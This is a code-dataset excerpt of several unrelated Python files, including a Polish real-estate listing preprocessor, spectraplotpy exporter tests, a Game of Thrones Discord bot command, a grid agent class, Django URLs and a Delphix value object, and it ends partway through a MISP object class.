prepared_table.append(to_append)\r\n except:\r\n prepared_table.append(None)\r\n\r\n for i in range(len(prepared_table)):\r\n column = []\r\n row = []\r\n try:\r\n for key, value in prepared_table[i].items():\r\n column.append(key.strip(':'))\r\n row.append(value)\r\n except:\r\n row.append(None)\r\n df_temp = pd.DataFrame([row], columns=column)\r\n params_table = pd.concat([params_table, df_temp], ignore_index=True)\r\n\r\n return params_table.where(pd.notnull(params_table),None)\r\n\r\n def get_number(self, price_information: str) -> str:\r\n \"\"\"Get only numeric information of price from string.\r\n Parameters\r\n ----------\r\n price_information: str\r\n string with numeric and string price information.\r\n Returns\r\n ------\r\n price_number: str\r\n string with numeric price information.\r\n \"\"\"\r\n signs = [',','.']\r\n if price_information in signs:\r\n price_number = price_information\r\n else:\r\n price_number = str.isdigit(price_information)\r\n return price_number\r\n\r\n def extract_price(self, apartment_details_price_table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Extract price and currency from a string and convert price to float.\r\n Parameters\r\n ----------\r\n apartment_details_price_table: pd.DataFrame\r\n column with information about price.\r\n Returns\r\n ------\r\n apartment_details_price_table: pd.DataFrame\r\n data frame where price information type was changed to float.\r\n \"\"\"\r\n\r\n currency = []\r\n for i in range(len(apartment_details_price_table)):\r\n try:\r\n filtered_str = filter(self.get_number, ''.join(apartment_details_price_table[i]))\r\n only_digit = \"\".join(filtered_str)\r\n if only_digit == \"\" or only_digit == None:\r\n apartment_details_price_table[i] = None\r\n currency.append(None)\r\n else:\r\n currency.append(''.join(apartment_details_price_table[i]).split()[-1])\r\n apartment_details_price_table[i] = float(only_digit.replace(\",\", \".\"))\r\n except:\r\n apartment_details_price_table[i] = None\r\n currency.append(None)\r\n \r\n self.apartment_details['currency'] = currency\r\n return apartment_details_price_table\r\n\r\n def prepare_additional_info(self, apartment_details_add_info_table: pd.DataFrame, apartment_details_details_table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Join additional information and details to additional information.\r\n Parameters\r\n ----------\r\n apartment_details_add_info_table: pd.DataFrame\r\n column with additional information.\r\n apartment_details_details_table: pd.DataFrame\r\n column with details information.\r\n Returns\r\n ------\r\n apartment_details_add_info_table: pd.DataFrame\r\n data frame with additional information.\r\n \"\"\"\r\n for i in range(len(apartment_details_add_info_table)):\r\n try:\r\n apartment_details_add_info_table[i] += (', ' + apartment_details_details_table[i].replace(\":\",\": \"))\r\n except:\r\n continue\r\n return apartment_details_add_info_table\r\n\r\n def prepare_description_table(self, apartment_details_description_table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Split description of 4000 characters to several columns and if record has more than 16000 characters check the language and get only polish description.\r\n Parameters\r\n ----------\r\n apartment_details_description_table: pd.DataFrame\r\n column with description.\r\n Returns\r\n ------\r\n description_1: List\r\n list with tha first part of description.\r\n \"\"\"\r\n description_1 = []\r\n description_2 = []\r\n description_3 = []\r\n description_4 = []\r\n\r\n\r\n for i in range(len(apartment_details_description_table)):\r\n desc_list = [None, None, None, None]\r\n if apartment_details_description_table[i]==None:\r\n description_splitted = None\r\n elif len(apartment_details_description_table[i]) > 16000:\r\n description = apartment_details_description_table[i]\r\n text = ' '.join(description.replace(\",\",\"\").replace(\"-\",\"\").split(\" \")).split()\r\n elements = [text[x:x+6] for x in range(0, len(text),6)]\r\n\r\n pl = []\r\n for index, element in enumerate(elements):\r\n element = list(map(str.lower,element))\r\n try:\r\n language = detect(\" \".join(element))\r\n except:\r\n language = 'pl'\r\n if language =='pl':\r\n pl.append(\" \".join(element))\r\n\r\n description_splitted = wrap(\" \".join(pl), 4000)\r\n\r\n else:\r\n try:\r\n description_splitted = wrap(apartment_details_description_table[i], 4000)\r\n except:\r\n description_splitted = wrap(''.join(apartment_details_description_table[i]), 4000)\r\n\r\n\r\n try:\r\n for element in range(len(description_splitted)):\r\n desc_list[element] = description_splitted[element]\r\n except:\r\n desc_list[element] = None\r\n\r\n description_1.append(desc_list[0])\r\n description_2.append(desc_list[1])\r\n description_3.append(desc_list[2])\r\n description_4.append(desc_list[3])\r\n\r\n self.apartment_details['description_2'] = description_2\r\n self.apartment_details['description_3'] = description_3\r\n self.apartment_details['description_4'] = description_4\r\n\r\n return description_1\r\n\r\n def create_table(self):\r\n \"\"\"Create final preprocessing table.\r\n Returns\r\n ------\r\n otodom_table: pd.DataFrame\r\n final preprocessing table with None instead of empty strings.\r\n \"\"\"\r\n otodom_table = pd.DataFrame()\r\n params_tables_otodom = self.prepare_table_information(table=self.remove_new_line_marks()['details'])\r\n otodom_table['area'] = self.apartment_details['Area']\r\n otodom_table['latitude'] = self.apartment_details['lat']\r\n otodom_table['longitude'] = self.apartment_details['lng']\r\n otodom_table['link'] = self.apartment_details['link']\r\n otodom_table['price'] = self.extract_price(self.apartment_details['price'])\r\n otodom_table['currency'] = self.apartment_details['currency']\r\n try:\r\n otodom_table['rooms'] = params_tables_otodom['Liczba pokoi']\r\n except:\r\n otodom_table['rooms'] = None\r\n try:\r\n otodom_table['floors_number'] = params_tables_otodom['Liczba pięter']\r\n except:\r\n otodom_table['floors_number'] = None\r\n try:\r\n otodom_table['floor'] = params_tables_otodom['Piętro']\r\n except:\r\n otodom_table['floor'] = None\r\n try:\r\n otodom_table['type_building'] = params_tables_otodom['Rodzaj zabudowy'].str.lower()\r\n except:\r\n otodom_table['type_building']=None\r\n try:\r\n otodom_table['material_building'] = params_tables_otodom['Materiał budynku'].str.lower()\r\n except:\r\n otodom_table['material_building'] = None\r\n try:\r\n otodom_table['year'] = params_tables_otodom['Rok budowy']\r\n except:\r\n otodom_table['year'] = None\r\n otodom_table['headers'] = self.apartment_details['additional_info_headers']\r\n otodom_table['additional_info'] = self.prepare_additional_info(apartment_details_add_info_table=self.apartment_details['additional_info'], apartment_details_details_table = self.apartment_details['details'])\r\n otodom_table['city'] = self.apartment_details['city']\r\n otodom_table['address'] = self.apartment_details['address']\r\n otodom_table['district'] = self.apartment_details['district']\r\n otodom_table['voivodeship'] = self.apartment_details['voivodeship']\r\n otodom_table['active'] = 'Yes'\r\n otodom_table['scrape_date'] = str(datetime.now().date())\r\n otodom_table['inactive_date'] = '-'\r\n otodom_table['page_name'] = 'Otodom'\r\n otodom_table['offer_title'] = self.apartment_details['title']\r\n otodom_table['description_1'] = self.prepare_description_table(self.apartment_details['description'])\r\n otodom_table['description_2'] = self.apartment_details['description_2']\r\n otodom_table['description_3'] = self.apartment_details['description_3']\r\n otodom_table['description_4'] = self.apartment_details['description_4']\r\n return otodom_table.replace({\"\": None})\r\n\r\nif \"__name__\" == \"__main__\":\r\n otodom_preprocess = Preprocessing_Otodom(apartment_details=apartments.where(pd.notnull(apartments),None), information_types=apartments.columns)\r\n\r\n start_time = datetime.now()\r\n otodom_table = otodom_preprocess.create_table()\r\n end_time = datetime.now()\r\n print('Duration: {}'.format(end_time - start_time))\r\n\r\n","sub_path":"Preprocessing_scripts/otodom.py","file_name":"otodom.py","file_ext":"py","file_size_in_byte":15496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"54121393","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nA couple of tests for the Exporter class and subclasses\n\"\"\"\n\nfrom spectraplotpy import Exporter\nfrom spectraplotpy import BaseTextExporter\nfrom spectraplotpy import CSVExporter\nfrom spectraplotpy import AvivExporter\n#from spectraplotpy import GraphicExporter\n\nfrom spectraplotpy import Dataset\n\ndef test_construction():\n \"\"\"Test the constructor of the class Exporter\"\"\"\n assert Exporter([])\n\ndef test_txt_construction():\n \"\"\"Test construction of the class BaseTextExporter\"\"\"\n assert BaseTextExporter([])\n\ndef test_default_function():\n \"\"\"Test for basic functionality\"\"\"\n ds = Dataset()\n bte = BaseTextExporter(ds)\n \n with open('.testfile.txt', 'w') as f:\n assert bte.write(f) is None\n\n assert bte.text()\n assert bte.save('.testfile.txt') is None\n\ndef test_aviv_exporter():\n \"\"\"Test for specific functionality of the AvivExporter\"\"\"\n ds = Dataset(x=[1, 2, 3], y=[1, 2, 3],\n metadata={'temp': 10, 'date': 'today'})\n ave = AvivExporter(ds)\n \n with open('.testfile.cd', 'w') as f:\n assert ave.write(f) is None\n\n assert ave.text()\n assert ave.save('.testfile.cd') is None\n\n\ndef test_csv_construction():\n ds = Dataset()\n assert CSVExporter(ds)\n\n\n\n\n","sub_path":"test/test_exporter.py","file_name":"test_exporter.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314863374","text":"import anapioficeandfire\r\nimport discord\r\nimport STATICS\r\nfrom commands import cmd_gify\r\nimport configparser\r\nimport random\r\n\r\napi = anapioficeandfire.API()\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read(\"SAVES/got_aliases.ini\")\r\n\r\n#aliases_houses = {}\r\n#\r\n#try:\r\n# for i in range(426, 450):\r\n# alias = api.get_house(id=i).name\r\n# if alias.startswith(\"House\"):\r\n# alias_splitted = alias.split(\" \")[1:]\r\n# alias = str(alias_splitted)[2:][:-2].replace(\",\", \"\").replace(\"'\", \"\")\r\n# if alias.__contains__(\" of \"):\r\n# alias = alias.split(\" of \")[0]\r\n# try:\r\n# aliases_houses[alias] = aliases_houses[alias] + \";\" + str(i)\r\n# except:\r\n# aliases_houses[alias] = str(i)\r\n# print(alias + \" : \" + aliases_houses[alias])\r\n#except:\r\n# print(\"error\")\r\n#config['Houses'] = aliases_houses\r\n#with open('../SAVES/got_aliases.ini', 'w') as configfile:\r\n# config.write(configfile)\r\n\r\nasync def executor(cmd, args, client, msg):\r\n try:\r\n if len(args) == 0 or len(args) == 1:\r\n await help(client, msg)\r\n return True\r\n embed = discord.Embed(\r\n title=\"<:null:397485751358455808>\",\r\n color=0x2ecc71,\r\n description=\" \"\r\n )\r\n embed.set_author(\r\n name=\"GAME OF THRONES\"\r\n )\r\n embed.set_footer(\r\n text=\"Hodor version \" + STATICS.version,\r\n icon_url=client.user.avatar_url\r\n )\r\n sended_msg = await client.send_message(msg.channel, \"Loading Data ... :inbox_tray:\")\r\n search_arg = \"\"\r\n for i in range(1, len(args)):\r\n search_arg += args[i] + \" \"\r\n if args[0] == \"character\":\r\n await get_character(search_arg, embed, client, sended_msg)\r\n elif args[0] == \"house\":\r\n await get_house(search_arg, embed, client, sended_msg)\r\n else:\r\n await help(client, msg)\r\n client.delete_message(sended_msg)\r\n return True\r\n return True\r\n except Exception as e:\r\n return e\r\n\r\n#----------------------------------------------Character--------------------------------------------------\r\nasync def get_character(name, embed, client, sended_msg):\r\n print(name)\r\n characters = api.get_characters(name=name)\r\n if len(characters) == 0:\r\n embed.add_field(\r\n name=\"No Character found with the name:\",\r\n value=str(name),\r\n )\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n if len(characters) == 2:\r\n list = \"\"\r\n for i in range(len(characters)):\r\n list += characters[i].name + \"\\n\"\r\n embed.add_field(\r\n name=\"Found %s Characters:\" % str(len(characters)),\r\n value=list,\r\n inline=False\r\n )\r\n if len(characters) == 1:\r\n character = characters[0]\r\n print(\"Found one Character \" + character.name)\r\n\r\n embed.set_author(\r\n name=character.name.upper()\r\n )\r\n\r\n if not character.name == \"\":\r\n embed.add_field(\r\n name=\"Name:\",\r\n value=str(character.name),\r\n )\r\n\r\n if not character.gender == \"\":\r\n embed.add_field(\r\n name=\"Gender:\",\r\n value=str(character.gender),\r\n )\r\n\r\n if not character.father == \"\":\r\n father = character.father\r\n if father.startswith(\"http\"):\r\n id = father.split(\"/\")[-1]\r\n father = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Father:\",\r\n value=father,\r\n )\r\n\r\n if not character.mother == \"\":\r\n mother = character.mother\r\n if mother.startswith(\"http\"):\r\n id = mother.split(\"/\")[-1]\r\n mother = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Mother:\",\r\n value=mother,\r\n )\r\n\r\n if not character.spouse == \"\":\r\n spouse = character.spouse\r\n if spouse.startswith(\"http\"):\r\n id = spouse.split(\"/\")[-1]\r\n spouse = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Spouse:\",\r\n value=spouse,\r\n )\r\n\r\n if not character.culture == \"\":\r\n embed.add_field(\r\n name=\"Culture:\",\r\n value=str(character.culture),\r\n )\r\n\r\n if not character.born == \"\":\r\n embed.add_field(\r\n name=\"Born:\",\r\n value=str(character.born),\r\n )\r\n\r\n if not character.died == \"\":\r\n embed.add_field(\r\n name=\"Died:\",\r\n value=str(character.died),\r\n )\r\n\r\n actors = \"\"\r\n for actor in character.playedBy:\r\n actors += actor + \"\\n\"\r\n if not actors == \"\":\r\n embed.add_field(\r\n name=\"Played By:\",\r\n value=actors,\r\n )\r\n\r\n titles = \"\"\r\n for title in character.titles:\r\n titles += title + \"\\n\"\r\n if not titles == \"\":\r\n embed.add_field(\r\n name=\"Titles:\",\r\n value=titles,\r\n )\r\n\r\n aliases = \"\"\r\n for alias in character.aliases:\r\n aliases += alias + \"\\n\"\r\n if not aliases == \"\":\r\n embed.add_field(\r\n name=\"Aliases:\",\r\n value=aliases,\r\n )\r\n\r\n allegiances = \"\"\r\n for allegiance in character.allegiances:\r\n if allegiance.startswith(\"http\"):\r\n id = allegiance.split(\"/\")[-1]\r\n allegiances += api.get_house(id=id).name + \"\\n\"\r\n else:\r\n allegiances += allegiance + \"\\n\"\r\n if not allegiances == \"\":\r\n embed.add_field(\r\n name=\"Allegiances:\",\r\n value=allegiances,\r\n )\r\n books = \"\"\r\n\r\n for book in character.povBooks:\r\n if book.startswith(\"http\"):\r\n id = book.split(\"/\")[-1]\r\n books += api.get_book(id=id).name + \"\\n\"\r\n else:\r\n books += book + \"\\n\"\r\n if not books == \"\":\r\n embed.add_field(\r\n name=\"Books:\",\r\n value=books,\r\n )\r\n\r\n seasons = \"\"\r\n for season in character.tvSeries:\r\n seasons += season + \"\\n\"\r\n if not seasons == \"\":\r\n embed.add_field(\r\n name=\"Series:\",\r\n value=seasons,\r\n )\r\n\r\n embed.add_field(\r\n name=\"<:null:397485751358455808>\",\r\n value=\"More Informations: http://awoiaf.westeros.org/index.php/\" + character.name.replace(\" \", \"_\")\r\n )\r\n\r\n embed.set_image(url=cmd_gify.get_gif_url(character.name))\r\n\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n\r\n\r\n#-------------------------------------------------------------House----------------------------------------------------------------\r\nasync def get_house(name, embed, client, sended_msg):\r\n ids=None\r\n houses=None\r\n try:\r\n if not name.lower().__contains__(\"of\"):\r\n alias = name.lower()\r\n if alias.startswith(\"house \"):\r\n alias = alias.split(\" \")[1]\r\n config_get = config['Houses'][alias.replace(\" \", \"\")]\r\n ids = config_get.split(\";\")\r\n print(\"Found alias \" + alias + \" : \" + str(ids))\r\n if len(ids) == 1:\r\n houses = api.get_houses(name=api.get_house(id=ids[0]).name)\r\n else:\r\n houses = []\r\n for id in ids:\r\n houses.append(api.get_house(id=id))\r\n else:\r\n i = \"1\"+1\r\n except:\r\n print(\"Dont found in aliases ...\")\r\n try:\r\n if name.lower().startswith(\"house \"):\r\n houses = api.get_houses(name=name)\r\n else:\r\n houses = api.get_houses(name=\"House \" + name)\r\n except:\r\n print(\"Dont found\")\r\n embed.add_field(\r\n name=\"No House found with the name:\",\r\n value=str(name),\r\n )\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n\r\n if len(houses) == 0:\r\n embed.add_field(\r\n name=\"No House found with the name:\",\r\n value=str(name),\r\n )\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n if len(houses) >= 2:\r\n list = \"\"\r\n for i in range(len(houses)):\r\n list += houses[i].name + \"\\n\"\r\n embed.add_field(\r\n name=\"Found %s Houses:\" % str(len(houses)),\r\n value=list,\r\n inline=False\r\n )\r\n if len(houses) == 1:\r\n house = houses[0]\r\n\r\n embed.set_author(\r\n name=house.name.upper()\r\n )\r\n\r\n if not house.name == \"\":\r\n embed.add_field(\r\n name=\"Name:\",\r\n value=str(house.name),\r\n )\r\n\r\n if not house.region == \"\":\r\n embed.add_field(\r\n name=\"Region:\",\r\n value=str(house.region),\r\n )\r\n\r\n if not house.currentLord == \"\":\r\n lord = house.currentLord\r\n if lord.startswith(\"http\"):\r\n id = lord.split(\"/\")[-1]\r\n lord = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Lord:\",\r\n value=lord,\r\n )\r\n\r\n if not house.overlord == \"\":\r\n overlord = house.overlord\r\n if overlord.startswith(\"http\"):\r\n id = overlord.split(\"/\")[-1]\r\n overlord = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"OverLord:\",\r\n value=overlord,\r\n )\r\n\r\n if not house.heir == \"\":\r\n heir = house.heir\r\n if heir.startswith(\"http\"):\r\n id = heir.split(\"/\")[-1]\r\n heir = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Heir:\",\r\n value=heir,\r\n )\r\n\r\n if not house.founded == \"\":\r\n embed.add_field(\r\n name=\"Founded:\",\r\n value=str(house.founded),\r\n )\r\n\r\n if not house.founder == \"\":\r\n founder = house.founder\r\n if founder.startswith(\"http\"):\r\n id = founder.split(\"/\")[-1]\r\n founder = api.get_character(id=id).name\r\n embed.add_field(\r\n name=\"Founder:\",\r\n value=founder,\r\n )\r\n\r\n if not house.coatOfArms == \"\":\r\n embed.add_field(\r\n name=\"Coat Of Arms:\",\r\n value=str(house.coatOfArms),\r\n )\r\n\r\n if not house.words == \"\":\r\n embed.add_field(\r\n name=\"Words:\",\r\n value=str(house.words),\r\n )\r\n\r\n seats = \"\"\r\n for seat in house.seats:\r\n seats += seat + \"\\n\"\r\n if not seats == \"\":\r\n embed.add_field(\r\n name=\"Seats:\",\r\n value=seats,\r\n )\r\n\r\n titles = \"\"\r\n for title in house.titles:\r\n titles += title + \"\\n\"\r\n if not titles == \"\":\r\n embed.add_field(\r\n name=\"Titles:\",\r\n value=titles,\r\n )\r\n\r\n if not house.diedOut == \"\":\r\n embed.add_field(\r\n name=\"Died Out:\",\r\n value=str(house.diedOut),\r\n )\r\n\r\n cadetbranches = \"\"\r\n for cadetbranch in house.cadetBranches:\r\n if cadetbranch.startswith(\"http\"):\r\n id = cadetbranch.split(\"/\")[-1]\r\n cadetbranches += api.get_house(id=id).name + \"\\n\"\r\n else:\r\n cadetbranches += cadetbranch + \"\\n\"\r\n if not cadetbranches == \"\":\r\n embed.add_field(\r\n name=\"Cadet Branches:\",\r\n value=cadetbranches,\r\n )\r\n\r\n embed.add_field(\r\n name=\"<:null:397485751358455808>\",\r\n value=\"More Informations: http://awoiaf.westeros.org/index.php/\" + house.name.split(\" of \")[0].replace(\" \", \"_\")\r\n )\r\n await client.add_reaction(sended_msg, \"🙏\")\r\n\r\n #embed.set_image(url=cmd_gify.get_gif_url(house.name))\r\n await client.edit_message(sended_msg, \" \", embed=embed)\r\n\r\n\r\nasync def help(client, msg):\r\n embed = discord.Embed(\r\n title=\"<:null:397485751358455808>\",\r\n color=0x2ecc71,\r\n description=\"\\n\"\r\n \"\"\r\n )\r\n embed.add_field(\r\n name=\"Commands:\",\r\n value=\"got house [name]\\n<:null:397485751358455808>\\n\"\r\n \"got character [name]\",\r\n )\r\n embed.add_field(\r\n name=\"Description:\",\r\n value=\"Shows informations\\nabout a House in GoT\\n\"\r\n \"Shows informations\\nabout a Character in GoT\",\r\n )\r\n embed.set_footer(\r\n text=\"Hodor version %s\" % STATICS.version,\r\n icon_url=client.user.avatar_url\r\n )\r\n embed.set_thumbnail(\r\n url=\"https://emojipedia-us.s3.amazonaws.com/thumbs/160/google/110/scroll_1f4dc.png\"\r\n )\r\n embed.set_author(\r\n name=\"HELP\"\r\n )\r\n\r\n await client.send_message(msg.channel, embed=embed)\r\n\r\n\r\nasync def send_sworn_private(house, client, user):\r\n house = api.get_houses(name=house)[0]\r\n print(\"Loading Sworns for \" + house.name + \" | Requested by \" + user.name)\r\n embed = discord.Embed(\r\n title=\"<:null:397485751358455808>\",\r\n color=0x2ecc71,\r\n description=\" \"\r\n )\r\n\r\n sworns = \"\"\r\n n = 0\r\n if len(house.swornMembers) > 20:\r\n n = 20\r\n else:\r\n n = len(house.swornMembers)\r\n for i in range(1, n):\r\n sworn = random.choice(house.swornMembers)\r\n if sworns.__contains__(sworn):\r\n sworn = random.choice(house.swornMembers)\r\n if sworn.startswith(\"http\"):\r\n try:\r\n id = sworn.split(\"/\")[-1]\r\n sworns += api.get_character(id=id).name + \", \"\r\n except:\r\n i = 0\r\n else:\r\n sworns += sworn + \"\\n\"\r\n if not sworns == \"\":\r\n embed.add_field(\r\n name=\"%s of the Sworn Members:\" % str(n),\r\n value=sworns,\r\n )\r\n\r\n embed.set_footer(\r\n text=\"Hodor version %s\" % STATICS.version,\r\n icon_url=client.user.avatar_url\r\n )\r\n\r\n embed.set_author(\r\n name=house.name.upper()\r\n )\r\n\r\n await client.send_message(user, embed=embed)\r\n","sub_path":"commands/got_old.py","file_name":"got_old.py","file_ext":"py","file_size_in_byte":14747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546022609","text":"from AgentState import AgentState\nfrom random import randint\n\nclass Agent:\n\tdef __init__(self,id, vertex):\n\t\tself.id = id\n\t\tself.state = AgentState()\n\t\tself.location = vertex\n\n\tdef get_coords_from_movement(self,direction, row, col):\n\t\tif direction == \"L\":\n\t\t\treturn row, col-1\n\t\telif direction == \"R\":\n\t\t\treturn row, col+1\n\t\telif direction == \"U\":\n\t\t\treturn row-1, col\n\t\telif direction == \"D\":\n\t\t\treturn row+1, col\n\t\telse:\n\t\t\treturn row, col\n\n\tdef transition(self,nearby_agents):\n\t\t# Depends on the application\n\t\tdirection_map = {0:\"S\", 1:\"L\", 2:\"R\", 3:\"U\", 4:\"D\"}\n\n\t\t# Try to cluster\n\t\tif len(nearby_agents) == 0:\n\t\t\treturn self.state, \"S\"\n\n\t\ttotal_dist = 0\n\t\tfor agent in nearby_agents:\n\t\t\ttotal_dist += abs(self.location.row-agent.location.row)\n\t\t\ttotal_dist += abs(self.location.col-agent.location.col)\n\n\t\tbest_move = \"S\"\n\t\tbest_distance = 0\n\n\t\tfor direction in direction_map.values():\n\t\t\tnew_loc = self.get_coords_from_movement(direction, self.location.row, self.location.col)\n\n\t\t\tdist = 0\n\t\t\tfor agent in nearby_agents:\n\t\t\t\tdist += abs(new_loc[0]-agent.location.row)+abs(new_loc[1]-agent.location.row)\n\t\t\tif dist > best_distance:\n\t\t\t\tbest_distance = dist\n\t\t\t\tbest_move = direction\n\t\treturn self.state, best_move\n\n\t\t# Random direction movement\n\t\t# return self.state, direction[randint(0,4)] \n\n\n","sub_path":"Agent.py","file_name":"Agent.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"66124952","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = patterns('', \n url(r'^ator/(?P[\\w-]+)/$', 'catalogo.views.ator'),\n url(r'^filme/(?P[\\w-]+)/$', 'catalogo.views.filme'),\n (r'^grappelli/', include('grappelli.urls')),\n (r'^admin/', include(admin.site.urls)),\n)\n\n#Serve os arquivos enviados \nif settings.DEBUG:\n urlpatterns += patterns('',\n (r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT}))\n\n#Essas regras precisam ficar apos os arquivos enviados\nurlpatterns += patterns('',\n url(r'^(?P\\w+)', 'catalogo.views.genero'),\n url(r'^$', 'catalogo.views.index', name='index'))","sub_path":"src/desafio_storm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"461675064","text":"#\n# Copyright 2017 by Delphix\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n#\n# This class has been automatically generated from:\n# /delphix-js-data-layout-create-parameters.json\n#\n# Do not edit this file manually!\n#\n\nfrom delphixpy.v1_9_0.web.vo.TypedObject import TypedObject\nfrom delphixpy.v1_9_0 import factory\nfrom delphixpy.v1_9_0 import common\n\nclass __Undef(object):\n def __repr__(self):\n return \"undef\"\n\n_UNDEFINED = __Undef()\n\nclass JSDataLayoutCreateParameters(TypedObject):\n \"\"\"\n *(extends* :py:class:`v1_9_0.web.vo.TypedObject` *)* The parameters used to\n create a data layout.\n \"\"\"\n def __init__(self, undef_enabled=True):\n super(JSDataLayoutCreateParameters, self).__init__()\n self._type = (\"JSDataLayoutCreateParameters\", True)\n self._data_sources = (self.__undef__, True)\n self._notes = (self.__undef__, True)\n self._properties = (self.__undef__, True)\n self._name = (self.__undef__, True)\n\n API_VERSION = \"1.9.0\"\n\n @classmethod\n def from_dict(cls, data, dirty=False, undef_enabled=True):\n obj = super(JSDataLayoutCreateParameters, cls).from_dict(data, dirty, undef_enabled)\n if \"dataSources\" not in data:\n raise ValueError(\"Missing required property \\\"dataSources\\\".\")\n obj._data_sources = []\n for item in data.get(\"dataSources\") or []:\n obj._data_sources.append(factory.create_object(item))\n factory.validate_type(obj._data_sources[-1], \"JSDataSourceCreateParameters\")\n obj._data_sources = (obj._data_sources, dirty)\n obj._notes = (data.get(\"notes\", obj.__undef__), dirty)\n if obj._notes[0] is not None and obj._notes[0] is not obj.__undef__:\n assert isinstance(obj._notes[0], basestring), (\"Expected one of [u'string'], but got %s\" % type(obj._notes[0]))\n common.validate_format(obj._notes[0], \"None\", None, 4096)\n obj._properties = (data.get(\"properties\", obj.__undef__), dirty)\n if obj._properties[0] is not None and obj._properties[0] is not obj.__undef__:\n assert isinstance(obj._properties[0], dict), (\"Expected one of [u'object'], but got %s\" % type(obj._properties[0]))\n common.validate_format(obj._properties[0], \"None\", None, None)\n if \"name\" not in data:\n raise ValueError(\"Missing required property \\\"name\\\".\")\n obj._name = (data.get(\"name\", obj.__undef__), dirty)\n if obj._name[0] is not None and obj._name[0] is not obj.__undef__:\n assert isinstance(obj._name[0], basestring), (\"Expected one of [u'string'], but got %s\" % type(obj._name[0]))\n common.validate_format(obj._name[0], \"None\", None, 256)\n return obj\n\n def to_dict(self, dirty=False):\n dct = super(JSDataLayoutCreateParameters, self).to_dict(dirty)\n\n def dictify(obj):\n if isinstance(obj, list):\n return [dictify(o) for o in obj]\n elif hasattr(obj, \"to_dict\"):\n return obj.to_dict()\n else:\n return obj\n if \"data_sources\" == \"type\" or (self.data_sources is not self.__undef__ and not (dirty and not self._data_sources[1])):\n dct[\"dataSources\"] = dictify(self.data_sources)\n if \"notes\" == \"type\" or (self.notes is not self.__undef__ and not (dirty and not self._notes[1])):\n dct[\"notes\"] = dictify(self.notes)\n if \"properties\" == \"type\" or (self.properties is not self.__undef__ and not (dirty and not self._properties[1])):\n dct[\"properties\"] = dictify(self.properties)\n if \"name\" == \"type\" or (self.name is not self.__undef__ and not (dirty and not self._name[1])):\n dct[\"name\"] = dictify(self.name)\n return dct\n\n def dirty(self):\n return self.from_dict(self.to_dict(dirty=False), dirty=True)\n\n def force_dirty(self):\n self._data_sources = (self._data_sources[0], True)\n self._notes = (self._notes[0], True)\n self._properties = (self._properties[0], True)\n self._name = (self._name[0], True)\n\n def is_dirty(self):\n return any([self._data_sources[1], self._notes[1], self._properties[1], self._name[1]])\n\n def __eq__(self, other):\n if other is None:\n return False\n if not isinstance(other, JSDataLayoutCreateParameters):\n return False\n return super(JSDataLayoutCreateParameters, self).__eq__(other) and \\\n self.data_sources == other.data_sources and \\\n self.notes == other.notes and \\\n self.properties == other.properties and \\\n self.name == other.name\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n return common.generate_repr_string(self)\n\n @property\n def data_sources(self):\n \"\"\"\n The set of data sources that belong to this data layout.\n\n :rtype: ``list`` of\n :py:class:`v1_9_0.web.vo.JSDataSourceCreateParameters`\n \"\"\"\n return self._data_sources[0]\n\n @data_sources.setter\n def data_sources(self, value):\n self._data_sources = (value, True)\n\n @property\n def notes(self):\n \"\"\"\n A description of this data layout to define what it is used for.\n\n :rtype: ``basestring``\n \"\"\"\n return self._notes[0]\n\n @notes.setter\n def notes(self, value):\n self._notes = (value, True)\n\n @property\n def properties(self):\n \"\"\"\n Key/value pairs used to specify attributes for this data layout.\n\n :rtype: ``dict``\n \"\"\"\n return self._properties[0]\n\n @properties.setter\n def properties(self, value):\n self._properties = (value, True)\n\n @property\n def name(self):\n \"\"\"\n The name of the data layout.\n\n :rtype: ``basestring``\n \"\"\"\n return self._name[0]\n\n @name.setter\n def name(self, value):\n self._name = (value, True)\n\n","sub_path":"src/main/resources/delphixpy/v1_9_0/web/vo/JSDataLayoutCreateParameters.py","file_name":"JSDataLayoutCreateParameters.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"245308667","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\nimport requests\nfrom .abstractgenerator import AbstractMISPObjectGenerator\nfrom .. import InvalidMISPObject\n\nclass SBSignatureObject(AbstractMISPObjectGenerator):\n '''\n Sandbox Analyzer\n '''\n def __init__(self, report, software, parsed=None, filepath=None, pseudofile=None, standalone=True, **kwargs):\n # PY3 way:\n # super().__init__(\"virustotal-report\")\n super(SBSignatureObject, 